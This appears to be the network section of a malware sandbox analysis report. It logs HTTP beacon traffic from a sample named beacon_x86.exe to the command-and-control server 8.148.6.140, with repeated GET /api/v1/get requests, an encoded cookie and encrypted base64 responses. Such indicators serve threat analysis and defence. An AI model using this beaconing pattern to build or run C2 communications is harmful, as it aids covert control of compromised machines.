        Jan 10, 2025 09:29:39.269295931 CET4982780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:39.278930902 CET80498278.148.6.140192.168.2.8
        Jan 10, 2025 09:29:40.236238003 CET80498278.148.6.140192.168.2.8
        Jan 10, 2025 09:29:40.236628056 CET80498278.148.6.140192.168.2.8
        Jan 10, 2025 09:29:40.239007950 CET4982780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:40.239240885 CET4982780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:40.244147062 CET80498278.148.6.140192.168.2.8
        Jan 10, 2025 09:29:40.353065968 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:40.358165026 CET80498288.148.6.140192.168.2.8
        Jan 10, 2025 09:29:40.359033108 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:40.359179020 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:40.363950014 CET80498288.148.6.140192.168.2.8
        Jan 10, 2025 09:29:41.986717939 CET80498288.148.6.140192.168.2.8
        Jan 10, 2025 09:29:41.986922026 CET80498288.148.6.140192.168.2.8
        Jan 10, 2025 09:29:41.986922026 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:41.987015009 CET80498288.148.6.140192.168.2.8
        Jan 10, 2025 09:29:41.987031937 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:41.987155914 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:41.989934921 CET4982880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:41.994721889 CET80498288.148.6.140192.168.2.8
        Jan 10, 2025 09:29:42.103010893 CET4982980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:42.107904911 CET80498298.148.6.140192.168.2.8
        Jan 10, 2025 09:29:42.108087063 CET4982980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:42.108176947 CET4982980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:42.112998962 CET80498298.148.6.140192.168.2.8
        Jan 10, 2025 09:29:43.064197063 CET80498298.148.6.140192.168.2.8
        Jan 10, 2025 09:29:43.064261913 CET80498298.148.6.140192.168.2.8
        Jan 10, 2025 09:29:43.064435005 CET4982980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:43.066987991 CET4982980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:43.180999994 CET4982980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:43.181238890 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:43.185916901 CET80498298.148.6.140192.168.2.8
        Jan 10, 2025 09:29:43.186192989 CET80498308.148.6.140192.168.2.8
        Jan 10, 2025 09:29:43.186419010 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:43.186630011 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:43.191529989 CET80498308.148.6.140192.168.2.8
        Jan 10, 2025 09:29:44.147357941 CET80498308.148.6.140192.168.2.8
        Jan 10, 2025 09:29:44.147422075 CET80498308.148.6.140192.168.2.8
        Jan 10, 2025 09:29:44.147428036 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.147458076 CET80498308.148.6.140192.168.2.8
        Jan 10, 2025 09:29:44.147464991 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.147500038 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.147855997 CET4983080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.152729988 CET80498308.148.6.140192.168.2.8
        Jan 10, 2025 09:29:44.258955002 CET4983180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.264101982 CET80498318.148.6.140192.168.2.8
        Jan 10, 2025 09:29:44.264208078 CET4983180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.264313936 CET4983180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:44.269227028 CET80498318.148.6.140192.168.2.8
        Jan 10, 2025 09:29:45.863683939 CET80498318.148.6.140192.168.2.8
        Jan 10, 2025 09:29:45.863743067 CET80498318.148.6.140192.168.2.8
        Jan 10, 2025 09:29:45.863756895 CET4983180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:45.863807917 CET4983180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:45.864142895 CET4983180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:45.869062901 CET80498318.148.6.140192.168.2.8
        Jan 10, 2025 09:29:46.099179029 CET4983280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:46.104444027 CET80498328.148.6.140192.168.2.8
        Jan 10, 2025 09:29:46.104538918 CET4983280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:46.122823000 CET4983280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:46.127707005 CET80498328.148.6.140192.168.2.8
        Jan 10, 2025 09:29:47.095360041 CET80498328.148.6.140192.168.2.8
        Jan 10, 2025 09:29:47.095436096 CET80498328.148.6.140192.168.2.8
        Jan 10, 2025 09:29:47.095470905 CET4983280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:47.095541954 CET4983280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:47.095613956 CET4983280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:47.100492001 CET80498328.148.6.140192.168.2.8
        Jan 10, 2025 09:29:47.212054968 CET4983380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:47.217222929 CET80498338.148.6.140192.168.2.8
        Jan 10, 2025 09:29:47.217313051 CET4983380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:47.217442036 CET4983380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:47.222394943 CET80498338.148.6.140192.168.2.8
        Jan 10, 2025 09:29:51.199580908 CET80498338.148.6.140192.168.2.8
        Jan 10, 2025 09:29:51.199651003 CET4983380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:51.199698925 CET80498338.148.6.140192.168.2.8
        Jan 10, 2025 09:29:51.199739933 CET4983380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:51.199831009 CET4983380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:51.204530954 CET80498338.148.6.140192.168.2.8
        Jan 10, 2025 09:29:51.305890083 CET4983480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:51.310798883 CET80498348.148.6.140192.168.2.8
        Jan 10, 2025 09:29:51.310872078 CET4983480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:51.310986042 CET4983480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:51.315768003 CET80498348.148.6.140192.168.2.8
        Jan 10, 2025 09:29:55.313442945 CET4983480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:55.467858076 CET4983580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:55.473121881 CET80498358.148.6.140192.168.2.8
        Jan 10, 2025 09:29:55.473243952 CET4983580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:55.475022078 CET4983580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:55.479979038 CET80498358.148.6.140192.168.2.8
        Jan 10, 2025 09:29:59.447546959 CET80498358.148.6.140192.168.2.8
        Jan 10, 2025 09:29:59.447575092 CET80498358.148.6.140192.168.2.8
        Jan 10, 2025 09:29:59.447719097 CET4983580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:59.447813034 CET4983580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:59.452579975 CET80498358.148.6.140192.168.2.8
        Jan 10, 2025 09:29:59.556885004 CET4983680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:59.561774015 CET80498368.148.6.140192.168.2.8
        Jan 10, 2025 09:29:59.561853886 CET4983680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:59.562051058 CET4983680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:59.566802025 CET80498368.148.6.140192.168.2.8
        Jan 10, 2025 09:30:01.140414000 CET80498368.148.6.140192.168.2.8
        Jan 10, 2025 09:30:01.140435934 CET80498368.148.6.140192.168.2.8
        Jan 10, 2025 09:30:01.140563011 CET4983680192.168.2.88.148.6.140
        Jan 10, 2025 09:30:01.140782118 CET4983680192.168.2.88.148.6.140
        Jan 10, 2025 09:30:01.145617962 CET80498368.148.6.140192.168.2.8
        Jan 10, 2025 09:30:01.260026932 CET4983780192.168.2.88.148.6.140
        Jan 10, 2025 09:30:01.265607119 CET80498378.148.6.140192.168.2.8
        Jan 10, 2025 09:30:01.265718937 CET4983780192.168.2.88.148.6.140
        Jan 10, 2025 09:30:01.265882015 CET4983780192.168.2.88.148.6.140
        Jan 10, 2025 09:30:01.271116018 CET80498378.148.6.140192.168.2.8
        Jan 10, 2025 09:30:05.272417068 CET4983780192.168.2.88.148.6.140
        Jan 10, 2025 09:30:05.385138988 CET4983880192.168.2.88.148.6.140
        Jan 10, 2025 09:30:05.390315056 CET80498388.148.6.140192.168.2.8
        Jan 10, 2025 09:30:05.390459061 CET4983880192.168.2.88.148.6.140
        Jan 10, 2025 09:30:05.393604040 CET4983880192.168.2.88.148.6.140
        Jan 10, 2025 09:30:05.398488045 CET80498388.148.6.140192.168.2.8
        Jan 10, 2025 09:30:09.410484076 CET4983880192.168.2.88.148.6.140
        Jan 10, 2025 09:30:09.647708893 CET4983980192.168.2.88.148.6.140
        Jan 10, 2025 09:30:09.652602911 CET80498398.148.6.140192.168.2.8
        Jan 10, 2025 09:30:09.652673006 CET4983980192.168.2.88.148.6.140
        Jan 10, 2025 09:30:09.653590918 CET4983980192.168.2.88.148.6.140
        Jan 10, 2025 09:30:09.658557892 CET80498398.148.6.140192.168.2.8
        Jan 10, 2025 09:30:10.625997066 CET80498398.148.6.140192.168.2.8
        Jan 10, 2025 09:30:10.626405954 CET80498398.148.6.140192.168.2.8
        Jan 10, 2025 09:30:10.626424074 CET80498398.148.6.140192.168.2.8
        Jan 10, 2025 09:30:10.626606941 CET4983980192.168.2.88.148.6.140
        Jan 10, 2025 09:30:10.626792908 CET4983980192.168.2.88.148.6.140
        Jan 10, 2025 09:30:10.631822109 CET80498398.148.6.140192.168.2.8
        Jan 10, 2025 09:30:10.743510008 CET4984080192.168.2.88.148.6.140
        Jan 10, 2025 09:30:10.748519897 CET80498408.148.6.140192.168.2.8
        Jan 10, 2025 09:30:10.750987053 CET4984080192.168.2.88.148.6.140
        Jan 10, 2025 09:30:10.751080036 CET4984080192.168.2.88.148.6.140
        Jan 10, 2025 09:30:10.755889893 CET80498408.148.6.140192.168.2.8
        Jan 10, 2025 09:30:11.767172098 CET80498408.148.6.140192.168.2.8
        Jan 10, 2025 09:30:11.767241955 CET80498408.148.6.140192.168.2.8
        Jan 10, 2025 09:30:11.767239094 CET4984080192.168.2.88.148.6.140
        Jan 10, 2025 09:30:11.767292976 CET4984080192.168.2.88.148.6.140
        Jan 10, 2025 09:30:11.767380953 CET4984080192.168.2.88.148.6.140
        Jan 10, 2025 09:30:11.772198915 CET80498408.148.6.140192.168.2.8
        Jan 10, 2025 09:30:11.885257959 CET4984180192.168.2.88.148.6.140
        Jan 10, 2025 09:30:11.890403032 CET80498418.148.6.140192.168.2.8
        Jan 10, 2025 09:30:11.890535116 CET4984180192.168.2.88.148.6.140
        Jan 10, 2025 09:30:11.890676022 CET4984180192.168.2.88.148.6.140
        Jan 10, 2025 09:30:11.895509958 CET80498418.148.6.140192.168.2.8
        Jan 10, 2025 09:30:12.876468897 CET80498418.148.6.140192.168.2.8
        Jan 10, 2025 09:30:12.876609087 CET80498418.148.6.140192.168.2.8
        Jan 10, 2025 09:30:12.876687050 CET4984180192.168.2.88.148.6.140
        Jan 10, 2025 09:30:12.876688004 CET4984180192.168.2.88.148.6.140
        Jan 10, 2025 09:30:12.877587080 CET4984180192.168.2.88.148.6.140
        Jan 10, 2025 09:30:12.882400036 CET80498418.148.6.140192.168.2.8
        Jan 10, 2025 09:30:12.994792938 CET4984280192.168.2.88.148.6.140
        Jan 10, 2025 09:30:13.000751972 CET80498428.148.6.140192.168.2.8
        Jan 10, 2025 09:30:13.000850916 CET4984280192.168.2.88.148.6.140
        Jan 10, 2025 09:30:13.001436949 CET4984280192.168.2.88.148.6.140
        Jan 10, 2025 09:30:13.006820917 CET80498428.148.6.140192.168.2.8
        Jan 10, 2025 09:30:13.970474958 CET80498428.148.6.140192.168.2.8
        Jan 10, 2025 09:30:13.970537901 CET80498428.148.6.140192.168.2.8
        Jan 10, 2025 09:30:13.970551968 CET4984280192.168.2.88.148.6.140
        Jan 10, 2025 09:30:13.970602036 CET4984280192.168.2.88.148.6.140
        Jan 10, 2025 09:30:13.970792055 CET4984280192.168.2.88.148.6.140
        Jan 10, 2025 09:30:13.975572109 CET80498428.148.6.140192.168.2.8
        Jan 10, 2025 09:30:14.087336063 CET4984380192.168.2.88.148.6.140
        Jan 10, 2025 09:30:14.092154980 CET80498438.148.6.140192.168.2.8
        Jan 10, 2025 09:30:14.092220068 CET4984380192.168.2.88.148.6.140
        Jan 10, 2025 09:30:14.092387915 CET4984380192.168.2.88.148.6.140
        Jan 10, 2025 09:30:14.097187042 CET80498438.148.6.140192.168.2.8
        Jan 10, 2025 09:30:24.056334972 CET80498438.148.6.140192.168.2.8
        Jan 10, 2025 09:30:24.056401968 CET4984380192.168.2.88.148.6.140
        Jan 10, 2025 09:30:24.056410074 CET80498438.148.6.140192.168.2.8
        Jan 10, 2025 09:30:24.056478024 CET4984380192.168.2.88.148.6.140
        Jan 10, 2025 09:30:24.056538105 CET4984380192.168.2.88.148.6.140
        Jan 10, 2025 09:30:24.061918020 CET80498438.148.6.140192.168.2.8
        • 8.148.6.140
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.8497068.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:12.423816919 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:13.407344103 CET248INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:13 GMT
        Server: nginx
        Content-Length: 64
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6a 45 6e 67 59 36 44 77 49 42 32 34 77 39 68 62 65 77 41 59 79 35 6b 6c 4b 5a 74 42 35 34 55 62 67 32 49 79 71 67 41 6e 31 4d 35 38 66 69 74 61 52 37 74 39 5a 54 6e 56 2b 49 67 50 4c 6d 46 69
        Data Ascii: jEngY6DwIB24w9hbewAYy5klKZtB54Ubg2IyqgAn1M58fitaR7t9ZTnV+IgPLmFi


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.8497078.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:13.528750896 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:17.519165039 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:17 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 7a 74 2f 2f 39 43 79 61 43 46 49 73 68 68 46 59 58 6d 43 52 2b 5a 4e 34 7a 70 71 6c 6f 65 6d 2f 6d 4c 5a 4a 72 34 48 57 32 2f 36 44 41 32 43 34 41 6e 59 38 70 4c 4e 45 79 35 71 58 6a 53 32 65 43 53 51 63 36 56 4c 64 79 41 37 46 65 70 33 59 6b 76 6f 6c 41 63 57 47 65 5a 2f 75 47 30 51 4c 71 7a 2b 58 6b 52 4e 68 4c 63 65 52 4e 51 63 37 7a 74 43 6a 72 6d 76 44 75 65 4c 75 7a 71 4b 7a 32 37 68 78 36 6c 6c 75 34 34 48 69 42 6b 72 4d 59 52 52 72 34 6a 66 46 6e 56 46 37 43 74 70 39 6f 39 6a 4a 30 58 47 76 65 4a 46 77 78 43 4d 51 38 7a 73 51 49 55 46 4b 33 77 63 77 50 71 4a 72 76 6b 2b 62 6f 54 77 70 30 42 48 71 48 6d 78 72 73 7a 58 6a 41 77 3d 3d
        Data Ascii: zt//9CyaCFIshhFYXmCR+ZN4zpqloem/mLZJr4HW2/6DA2C4AnY8pLNEy5qXjS2eCSQc6VLdyA7Fep3YkvolAcWGeZ/uG0QLqz+XkRNhLceRNQc7ztCjrmvDueLuzqKz27hx6llu44HiBkrMYRRr4jfFnVF7Ctp9o9jJ0XGveJFwxCMQ8zsQIUFK3wcwPqJrvk+boTwp0BHqHmxrszXjAw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.8497088.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:17.644833088 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:18.610219955 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:18 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 62 55 2f 79 72 7a 2b 46 6f 68 37 36 6b 76 48 4b 56 4f 30 71 54 65 66 75 2b 2f 58 6d 34 4a 44 36 58 52 73 6e 5a 6d 5a 78 2f 48 6b 2f 4e 57 55 6b 38 34 6f 30 64 6c 74 76 6e 68 69 6d 47 64 31 41 45 4c 74 2b 53 31 6e 4a 73 67 77 7a 4d 52 30 57 69 73 43 70 31 66 30 52 4a 53 4b 38 54 31 32 4b 6a 6d 76 79 6e 46 31 63 6f 2b 37 62 56 43 72 79 4a 68 31 6d 7a 4e 73 54 55 34 5a 72 4b 4c 52 34 78 56 61 2b 73 77 6c 45 4d 4c 6e 69 4f 67 51 54 55 63 7a 35 4d 4f 66 67 67 4c 36 4c 61 54 32 6e 54 34 73 6e 73 57 67 67 71 42 6d 71 54 59 4c 58 2b 70 31 36 43 62 4f 73 41 41 45 42 4e 56 6c 78 4a 73 58 71 48 70 69 30 2b 4e 45 76 6e 68 32 33 55 69 2f 55 66 51 3d 3d
        Data Ascii: bU/yrz+Foh76kvHKVO0qTefu+/Xm4JD6XRsnZmZx/Hk/NWUk84o0dltvnhimGd1AELt+S1nJsgwzMR0WisCp1f0RJSK8T12KjmvynF1co+7bVCryJh1mzNsTU4ZrKLR4xVa+swlEMLniOgQTUcz5MOfggL6LaT2nT4snsWggqBmqTYLX+p16CbOsAAEBNVlxJsXqHpi0+NEvnh23Ui/UfQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.8497098.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:18.731815100 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:19.700913906 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:19 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 57 77 47 4a 70 52 6c 55 75 76 50 78 6f 72 4a 46 7a 35 59 74 6a 30 45 51 56 69 56 32 41 6b 4a 65 41 39 43 62 55 63 43 67 4e 77 65 71 70 72 36 34 70 33 4c 6b 44 75 4b 6d 4f 50 58 39 59 38 56 7a 2b 7a 43 76 63 43 49 30 59 46 6c 6b 78 31 44 70 42 38 6b 71 67 67 55 6e 50 54 69 63 70 35 2f 62 63 46 44 5a 47 76 4e 50 73 57 34 77 72 41 74 61 42 44 35 72 33 49 4c 54 7a 71 4b 5a 4d 57 37 78 41 31 66 51 70 6c 6a 38 4c 49 4c 32 33 4f 69 4d 61 39 63 35 41 52 79 37 71 43 5a 4c 43 6e 55 71 47 4c 34 34 41 36 37 56 63 59 4d 30 71 62 6d 6e 51 4f 65 35 67 37 71 67 78 42 41 69 73 36 75 62
        Data Ascii: WwGJpRlUuvPxorJFz5Ytj0EQViV2AkJeA9CbUcCgNweqpr64p3LkDuKmOPX9Y8Vz+zCvcCI0YFlkx1DpB8kqggUnPTicp5/bcFDZGvNPsW4wrAtaBD5r3ILTzqKZMW7xA1fQplj8LIL23OiMa9c5ARy7qCZLCnUqGL44A67VcYM0qbmnQOe5g7qgxBAis6ub


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.8497108.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:19.809997082 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:20.779411077 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:20 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 41 61 75 2b 56 4a 4d 46 78 49 74 54 45 35 71 2b 75 6b 79 30 43 63 44 62 48 6a 61 71 6e 4c 41 59 6a 4f 54 5a 6a 46 78 36 36 59 32 4e 4b 33 77 61 69 61 6f 38 58 74 41 70 71 61 51 68 64 66 43 53 34 4e 61 56 4a 33 77 54 41 48 2b 57 58 6d 36 58 38 42 45 34 6f 6f 2b 79 38 79 78 73 38 68 56 49 4e 6f 70 4c 79 6c 68 6e 44 56 75 6f 61 58 66 57 2b 78 44 7a 67 6e 36 57 37 58 61 64 55 66 58 68 32 34 32 76 68 75 77 74 54 72 45 39 54 76 77 37 6e 43 74 4c 36 36 75 79 66 38 6b 4d 69 54 6b 55 74 70 6c 59 4b 50 54 78 75 72 39 43 62 78 4e 7a 63 5a 34 34 51 47 65 30 68 32 4c 55 77 54 46 2f 39 57 31 73 73 75 73 5a 64 48 68 49 74 4e 2f 38 43 4e 42 6d 54 67 35 41 32 64 4f 6a 36 76 63 31 4d 31 37 4c 6c 46 69 66 61 4a 49 6e 54 42 42 62 64 76 35 78 4e 61 74 41 59 6d 49 75 36 65 4b 4b
        Data Ascii: Aau+VJMFxItTE5q+uky0CcDbHjaqnLAYjOTZjFx66Y2NK3waiao8XtApqaQhdfCS4NaVJ3wTAH+WXm6X8BE4oo+y8yxs8hVINopLylhnDVuoaXfW+xDzgn6W7XadUfXh242vhuwtTrE9Tvw7nCtL66uyf8kMiTkUtplYKPTxur9CbxNzcZ44QGe0h2LUwTF/9W1ssusZdHhItN/8CNBmTg5A2dOj6vc1M17LlFifaJInTBBbdv5xNatAYmIu6eKK


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.8497118.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:20.929698944 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:21.920200109 CET421INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:21 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 7a 54 4f 6d 6a 72 30 66 46 61 6f 64 4f 69 63 33 32 4c 51 4a 45 7a 52 51 42 6b 47 69 50 58 73 6d 45 4b 6d 4b 74 36 68 4c 31 6e 54 4c 44 62 33 54 74 45 46 71 74 44 57 42 4c 42 6c 69 67 37 4b 61 72 44 6b 72 4c 78 53 4b 4e 67 56 67 7a 2f 37 56 38 34 57 50 58 37 31 38 5a 53 61 39 2b 62 4d 67 31 5a 58 59 4f 4b 72 49 4d 70 78 5a 2b 6b 37 37 36 59 4c 79 6e 55 48 79 76 4c 53 32 69 30 63 43 4b 34 72 30 30 6c 79 36 4c 7a 72 6f 36 47 6f 32 58 35 69 55 4b 54 41 44 61 67 4e 30 35 49 64 4b 51 43 4c 74 2f 56 4f 6f 69 62 72 35 4f 62 4d 4b 49 2f 34 47 37 65 49 4c 4c 49 76 32 59 4f 2b 33 51 63 38 63 42 68 49 70 35 36 72 53 63 47 76 31 6a 31 4f 41 73 6d 46 67 32 5a 6c 66 31 68 66 61 43 57 2b 42 39 57 49 67 35 30 4d 3d
        Data Ascii: zTOmjr0fFaodOic32LQJEzRQBkGiPXsmEKmKt6hL1nTLDb3TtEFqtDWBLBlig7KarDkrLxSKNgVgz/7V84WPX718ZSa9+bMg1ZXYOKrIMpxZ+k776YLynUHyvLS2i0cCK4r00ly6Lzro6Go2X5iUKTADagN05IdKQCLt/VOoibr5ObMKI/4G7eILLIv2YO+3Qc8cBhIp56rScGv1j1OAsmFg2Zlf1hfaCW+B9WIg50M=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.8497128.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:22.029737949 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
